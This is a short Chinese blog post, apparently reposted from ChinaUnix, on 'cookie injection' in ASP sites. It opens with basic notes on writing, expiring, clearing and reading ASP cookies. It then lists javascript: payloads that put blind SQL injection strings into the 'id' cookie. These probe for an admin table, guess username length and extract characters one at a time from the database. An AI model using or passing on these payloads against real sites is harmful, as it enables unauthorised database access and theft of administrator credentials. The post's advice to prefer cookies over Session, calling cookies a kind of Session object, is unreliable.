Cookies注入

leogeng1

Cookies注入：
1.如何写入Cookies？
　　Response.Cookies("字段名")=变量或字符串，例如：
　　Response.Cookies("name2")="Dingdang"
　　
　　2.如何设置Cookies时间？
　　Response.Cookies("字段名").expires=时间函数+N，例如：
　　Response.Cookies("name2").expires=date+1，表示Cookies保存1天，再比如：
　　Response.Cookies("name2").expires=Hour+8，表示Cookies保存8小时。
　　
　　3.在以往的ASP教程中，很少有介绍Cookies退出的方法。在“退出”这个ASP页中可以这样写：
　　Response.Cookies("字段名")=""
　　之后，在客户端的浏览器就清除了Cookies，并且Cookies文件会消失。注意有多少个字段，就要写多少句来清除。
　　
　　4.如何读取Cookies？
　　变量名=Request.Cookies("字段名")，例如：
　　name2=Request.Cookies("name2")
　　如果网页中写入这句，则会显示“Dingdang”。
　　也可以这样直接读取Cookies，
　　
　　Cookies是属于Session对象的一种。但有不同，Cookies不会占服务器资源；而“Session”则会占用服务器资源。所以，尽量不要使用Session，而使用Cookies。
　　
　　指令：
　　
　　javascript:alert(document.cookie="id="+escape("156 and 1=1"));
　　javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0"));
　　//猜是否有admin表
　　javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0"));
　　//猜是否有username表
　　javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5"));
　　//看管理员密码是否是5位
　　javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97"));
　　//第一位是否是ASC码97,相当于a
　　javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));
　　javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97"));
　　//第二位
　　javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));
　　//看系统表

本文来自ChinaUnix博客，如果查看原文请点：http://blog.chinaunix.net/u3/101492/showart_2021501.html